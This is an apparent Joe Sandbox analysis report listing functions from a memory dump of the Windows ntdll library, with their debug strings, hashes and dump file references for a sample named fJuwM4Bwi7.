                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                        • API String ID: 3446177414-2283098728
                                        • Opcode ID: 74b1db82f8defa0616d6c482c042f26e3e240cfd684276c283b514029670e084
                                        • Instruction ID: f83b78720bc28e15f6151b89b7b2eb0c795a25abc9fa9e9be13984608a5b8152
                                        • Opcode Fuzzy Hash: 74b1db82f8defa0616d6c482c042f26e3e240cfd684276c283b514029670e084
                                        • Instruction Fuzzy Hash: EE5137756023019FF716DF38C880B1A73ADBF88718F144A6DEA429B2C6DB70E845CB91
                                        Function 3294C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 329880E9
                                        • Failed to reallocate the system dirs string !, xrefs: 329880E2
                                        • minkernel\ntdll\ldrinit.c, xrefs: 329880F3
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-1783798831
                                        • Opcode ID: 72e76b24beeb60522fce31c7e6d937b3ad2629a7162a452d4ad2ac7625666daa
                                        • Instruction ID: a8ffb35ff3cc19da757b68fafd88303de2c72f2a62da68b0e6679738ed980098
                                        • Opcode Fuzzy Hash: 72e76b24beeb60522fce31c7e6d937b3ad2629a7162a452d4ad2ac7625666daa
                                        • Instruction Fuzzy Hash: FE4102B5546305AFE310EF68DD40B5B77E8EF48B54F00892AB948E7255EF70E842CB91
                                        Function 329943D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32994508
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 32994519
                                        • LdrpCheckRedirection, xrefs: 3299450F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 3446177414-3154609507
                                        • Opcode ID: 9c1deadb51bad78fb42e4bec20d72466cf874646803608379568f5f1d85059c4
                                        • Instruction ID: 78f3935d77dd70aa1a0652a381715539797800ec094e9fe90ab02b993d7cba5b
                                        • Opcode Fuzzy Hash: 9c1deadb51bad78fb42e4bec20d72466cf874646803608379568f5f1d85059c4
                                        • Instruction Fuzzy Hash: B2410276604311CFDB22CF58C940A9677E8AF4A778F055669EC8CDB356DB31E801CB91
                                        Function 3293510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                        Download Yara Rule
                                        Strings
                                        • WindowsExcludedProcs, xrefs: 3293514A
                                        • Kernel-MUI-Number-Allowed, xrefs: 32935167
                                        • Kernel-MUI-Language-SKU, xrefs: 3293534B
                                        • Kernel-MUI-Language-Allowed, xrefs: 3293519B
                                        • Kernel-MUI-Language-Disallowed, xrefs: 32935272
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                        • API String ID: 0-258546922
                                        • Opcode ID: a350d60fc32d080c12ef7cdf5254a7a009f97df4dcfc1357ec77ac69f5be393c
                                        • Instruction ID: ad9644bcbe8cf7311038bb9d564f12b8a870cc6392d14864723fe050d46499c9
                                        • Opcode Fuzzy Hash: a350d60fc32d080c12ef7cdf5254a7a009f97df4dcfc1357ec77ac69f5be393c
                                        • Instruction Fuzzy Hash: EDF10BB6D01219EFDB16DF98C950ADEBBBCFF0C754F50405AE605A7211DAB49E01CBA0
                                        Function 32907662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                        • API String ID: 0-3061284088
                                        • Opcode ID: 30613163fac8df58b9a1d694da9019e4fd100a6f24b583daa61bba55589d3ee2
                                        • Instruction ID: 9df62a670d95bdec5d07d429d429005ebacc1c0a6bf33b93cff331fb920f7e10
                                        • Opcode Fuzzy Hash: 30613163fac8df58b9a1d694da9019e4fd100a6f24b583daa61bba55589d3ee2
                                        • Instruction Fuzzy Hash: 3901703A505244EFF3159368D428F9277ECEF4273CF14C889E0014B792CEA498C1DD60
                                        Function 32910485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32910586
                                        • kLsE, xrefs: 329105FE
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                        • API String ID: 3446177414-2547482624
                                        • Opcode ID: 0c59ef663da6e19f45e7a9f78032ce2f36bd9b1ac64da296158aca90b9e87d01
                                        • Instruction ID: f3d635979cbdbc9e0be011920e0e17ab054a4597b24d0216f12061ac2cf2f7a6
                                        • Opcode Fuzzy Hash: 0c59ef663da6e19f45e7a9f78032ce2f36bd9b1ac64da296158aca90b9e87d01
                                        • Instruction Fuzzy Hash: 4551DFB5A0074ADFE724DFA7C4407ABB7F8AF04344F01883ED99987241EB76A545CBA1
                                        Function 3291A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                        • API String ID: 0-379654539
                                        • Opcode ID: bf22029015fac59d1d63626c4762f85823f1d622ad594c7c201a6cf56f1db657
                                        • Instruction ID: fe119d3d8939c30d9b0d909dd3ea27b554a64257197dd0cf8820a73efae25fa3
                                        • Opcode Fuzzy Hash: bf22029015fac59d1d63626c4762f85823f1d622ad594c7c201a6cf56f1db657
                                        • Instruction Fuzzy Hash: F0C1AC7460838ACFE315CF5AC140B5AB7E4FF89744F00486AF8958B291EB74ED4ACB56
                                        Function 3294265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                        Download Yara Rule
                                        Strings
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 329820C0
                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32981FE3, 329820BB
                                        • .Local, xrefs: 329427F8
                                        • SXS: %s() passed the empty activation context, xrefs: 32981FE8
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                        • API String ID: 0-1239276146
                                        • Opcode ID: a137d0af2e5cf76ed40f64e0a6bf29463ab44f699e6d5a5afd3cc7174dad7f30
                                        • Instruction ID: 3b6c5ff85aebcaade78e41ead7cc74e3450ab16ddb3b423d7dad97ac44c97eec
                                        • Opcode Fuzzy Hash: a137d0af2e5cf76ed40f64e0a6bf29463ab44f699e6d5a5afd3cc7174dad7f30
                                        • Instruction Fuzzy Hash: 16A1AC79D003299BEB24CF64DC84B99B3B4BF58318F2501EAD808AB355DB709E81CF90
                                        Function 329163CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                        Download Yara Rule
                                        Strings
                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32970E72
                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32970DEC
                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32970EB5
                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32970E2F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                        • API String ID: 0-1468400865
                                        • Opcode ID: b8c89471492e5796a5958d8db01e68b436599d12baffc11df0e65b85d94a8cbb
                                        • Instruction ID: 7be8c165c51f173e2563c8daa69f80bc3bedf3e27223a56e66addf9aa5e985c7
                                        • Opcode Fuzzy Hash: b8c89471492e5796a5958d8db01e68b436599d12baffc11df0e65b85d94a8cbb
                                        • Instruction Fuzzy Hash: 7F71C0B19043089FD760CF15C885B877BACAF847A4F5044A9FD488B19BD775E588CBD2
                                        Function 3290F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                        • API String ID: 0-2586055223
                                        • Opcode ID: e95ecc0bd4b153d5c760ff2761a9d742d71b250d313f4157478a1298966814b8
                                        • Instruction ID: 1bfdb7cf4feb06ebe5cacf7e81dabd34de5825c13c688b1d9782dde93b89dcb5
                                        • Opcode Fuzzy Hash: e95ecc0bd4b153d5c760ff2761a9d742d71b250d313f4157478a1298966814b8
                                        • Instruction Fuzzy Hash: 466106752047889FE311CB64C844F6777EDFF84B68F054469F9948B292CB74D944CBA2
                                        Function 329090F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                        • API String ID: 0-1391187441
                                        • Opcode ID: 973b8691b26bfd954c4f168e59f587fef924f15790430f5aa6a0432c5b012757
                                        • Instruction ID: 7118f1e608764c03650c7f2416902e978f1eeab6b42c1093b62be9925e5500a3
                                        • Opcode Fuzzy Hash: 973b8691b26bfd954c4f168e59f587fef924f15790430f5aa6a0432c5b012757
                                        • Instruction Fuzzy Hash: 2431A33AA00209EFE751CB54DC84F9AB7BCEF45778F1084A5E815AB291EB70DD40CE60
                                        Function 32917072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID:
                                        • API String ID: 3446177414-0
                                        • Opcode ID: 769e39435fed25d41d0b0e1362ecc744f175e8b5c639d3161adf37b25ce7520b
                                        • Instruction ID: c8ca4c99b90a643fcfcc496fdf463f03bdabc5e77ae13c8340d840bc0b0437fc
                                        • Opcode Fuzzy Hash: 769e39435fed25d41d0b0e1362ecc744f175e8b5c639d3161adf37b25ce7520b
                                        • Instruction Fuzzy Hash: 5C510134A0070AEFEB09CF69CC447ADB7B9FF44755F10416AE90297290DFB0A955CB80
                                        Function 329A3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                        • API String ID: 0-1168191160
                                        • Opcode ID: e28d2d145b7ea3a0bd86952d720bb0d716a47360f66bf453d7e6817894e3c630
                                        • Instruction ID: 9e4ccf2953be8fd3e91136b17b84c3eb35f16ffb6d69416668bde10fc5fcef26
                                        • Opcode Fuzzy Hash: e28d2d145b7ea3a0bd86952d720bb0d716a47360f66bf453d7e6817894e3c630
                                        • Instruction Fuzzy Hash: 23F171B5A003288BDB64DF18CCA07E9B3B9EF48754F5480D9DE09A7241EB719E85CF58
                                        Function 32911380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                        Download Yara Rule
                                        Strings
                                        • HEAP: , xrefs: 329114B6
                                        • HEAP[%wZ]: , xrefs: 32911632
                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32911648
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                        • API String ID: 0-3178619729
                                        • Opcode ID: 356ccc16503bf1d31d9b706dfd0838401b2e7f087dfe24ce09831388e1e5300e
                                        • Instruction ID: 18a26dc0fb90efda8bb69affabb86190c9aeeef6990d4e4ede8b09c25245f7a5
                                        • Opcode Fuzzy Hash: 356ccc16503bf1d31d9b706dfd0838401b2e7f087dfe24ce09831388e1e5300e
                                        • Instruction Fuzzy Hash: 52E11474A04349AFEB28CF29C44177ABBF5EF49B14F14885DE896CB286DB34E941CB50
                                        Function 3293F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 32980128
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 329800C7
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 329800F1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        • Opcode ID: a53967d17d48399ec3835e141cbca0b56004ef313254fb03ecd49b667804e119
                                        • Instruction ID: f444dc03493d7a1a3203937ac4f47e946079688bb488936055020c747ff6f157
                                        • Opcode Fuzzy Hash: a53967d17d48399ec3835e141cbca0b56004ef313254fb03ecd49b667804e119
                                        • Instruction Fuzzy Hash: 6DE1F175609741DFE726CF28C880B1AB7E4BF84328F140A6DF6A58B2E1DB74D945CB42
                                        Function 3291B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                        • API String ID: 0-1145731471
                                        • Opcode ID: 86f340b706cbecc9f7ff627cfaf9de16d721bff8ec3cf3d526ba19fcf3c47149
                                        • Instruction ID: cd5b77cff0ade84d7c74b794117307aae3064c479f31b300370a47bd944bc857
                                        • Opcode Fuzzy Hash: 86f340b706cbecc9f7ff627cfaf9de16d721bff8ec3cf3d526ba19fcf3c47149
                                        • Instruction Fuzzy Hash: FCB1D376A117098FDB24CF6AC9A1B9DB7B6BF48798F104529E911EB790DB70E840CF04
                                        Function 3290A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: FilterFullPath$UseFilter$\??\
                                        • API String ID: 0-2779062949
                                        • Opcode ID: 3a1a0cfeeede908b850e63166b5145cdd525a89e7ec861e5da61804a44911e3e
                                        • Instruction ID: f51c0879ceb15f1d5bc08a58c0731881001548c6e0907c51c6384079f9b08952
                                        • Opcode Fuzzy Hash: 3a1a0cfeeede908b850e63166b5145cdd525a89e7ec861e5da61804a44911e3e
                                        • Instruction Fuzzy Hash: F4A171759016299FDB21DF24CC88BEAB7B8EF04714F1045EAE908A7250DB759EC5CF90
                                        Function 329A327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                        • API String ID: 0-318774311
                                        • Opcode ID: dfa34200605a27973dd55acc8d2d6aa63b59b9cf992d579a54bb5701f7c5f819
                                        • Instruction ID: 136babf405104bfaa022c4efc3a5ef2ccd28bb326f7e79902fe7ed3d839eac14
                                        • Opcode Fuzzy Hash: dfa34200605a27973dd55acc8d2d6aa63b59b9cf992d579a54bb5701f7c5f819
                                        • Instruction Fuzzy Hash: EC81BD75608340AFE715CB24C890B6AB7E8FF88754F80096DFD849B291DF74D904CB6A
                                        Function 3291B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                        • API String ID: 0-373624363
                                        • Opcode ID: 4354588a736cdcf520c70b8243a230659bf1790aa8316f9922969459921dcf56
                                        • Instruction ID: bad73544b0ea47565ddb7a58629221630208bf1d6e1075a069b6b53037d0bb7f
                                        • Opcode Fuzzy Hash: 4354588a736cdcf520c70b8243a230659bf1790aa8316f9922969459921dcf56
                                        • Instruction Fuzzy Hash: B391E175A05349CFEB21CF5AC4607DDB7B6FF05368F148199E814AB2D0DB78AA40CB94
                                        Function 329EB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 329EB3AA
                                        • GlobalizationUserSettings, xrefs: 329EB3B4
                                        • TargetNtPath, xrefs: 329EB3AF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                        • API String ID: 0-505981995
                                        • Opcode ID: ddf36ad5ce736668b2c1dc5522434ee595a020a1d1018a2ad509ebb637702a50
                                        • Instruction ID: 538e5867f816b377949aa7b615ec89848ecf4b7622bfb0e868689f70a7d78731
                                        • Opcode Fuzzy Hash: ddf36ad5ce736668b2c1dc5522434ee595a020a1d1018a2ad509ebb637702a50
                                        • Instruction Fuzzy Hash: AC61917294222CABDB22DF54DC98BD9B7B8BB04714F4101E9EA09A7251DB74DE84CF90
                                        Function 3290F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3296E455
                                        • HEAP: , xrefs: 3296E442
                                        • HEAP[%wZ]: , xrefs: 3296E435
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                        • API String ID: 0-1340214556
                                        • Opcode ID: b532e08abd360784d634b13a41f560216ff75a16ec4f2ff7fade3f2835a82172
                                        • Instruction ID: f5466aa9b4c2b81baa93e338f425e7c06132eab4e01a896794ed802b2631cfea
                                        • Opcode Fuzzy Hash: b532e08abd360784d634b13a41f560216ff75a16ec4f2ff7fade3f2835a82172
                                        • Instruction Fuzzy Hash: 87511735600788EFE715CBA4C884F9ABBFCFF04758F0484A5E9918B692DB74EA45CB50
                                        Function 329BD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                        Download Yara Rule
                                        Strings
                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 329BD7B2
                                        • HEAP: , xrefs: 329BD79F
                                        • HEAP[%wZ]: , xrefs: 329BD792
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                        • API String ID: 0-3815128232
                                        • Opcode ID: e0a05ae8c876ff84f749cb38626852d9038948746832dd00306d1d24e4ec3133
                                        • Instruction ID: c68dbe038a9c049ccb5669220079e02d23e55346753ce1b3f72806b5c5262b51
